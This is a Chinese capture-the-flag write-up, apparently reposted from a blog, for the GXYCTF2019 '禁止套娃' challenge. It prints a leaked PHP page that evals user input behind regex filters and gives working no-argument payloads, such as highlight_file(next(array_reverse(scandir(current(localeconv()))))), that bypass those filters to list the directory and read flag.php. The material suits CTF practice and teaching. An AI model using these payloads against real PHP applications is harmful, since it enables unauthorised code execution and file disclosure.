BUUCTF-----[GXYCTF2019]禁止套娃

本文主要是介绍BUUCTF-----[GXYCTF2019]禁止套娃，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

题目

目录扫描，扫到.git泄露，使用工具查看到index.php的源码

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");}}else{die("再好好想想！");}}else{die("还想读flag，臭弟弟！");}
}
// highlight_file(__FILE__);
?>

php代码审计

if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp']))

过滤了php伪协议

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))

无参执行，如scandir()可以，scandir(.)不可以

if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']))

过滤et|na|info|dec|bin|hex|oct|pi|log字符

解决

想要查看当前目录下的文件，scandir(.)括号中必须带点，但是被过滤，所以找输出为点的函数就行

.

输出array，第一个就是点字符，所以在找一个输出array中第一个数值的函数reset()可以,但是被过滤了

.

OK,找到后带入

?exp=print_r(scandir(current(localeconv())));

现在求flag.php的值，看到current()函数中相关的函数next()：将指针移动到下一个，是否可以利用next()进行读取呢？不行，也需要嵌套，next()是将数组进行移动，对返回值不行，只能另想个办法，flag.php是倒数第二个，如果先将array反向输出，在使用next()，就可以得到flag.php

print_r(next(array_reverse(scandir(current(localeconv())))));

只需要将PHP代码读取出来就可以了

highlight_file() 是 PHP 中的一个函数，用于以 HTML 格式高亮显示指定文件的 PHP 代码

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

这篇关于BUUCTF-----[GXYCTF2019]禁止套娃的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---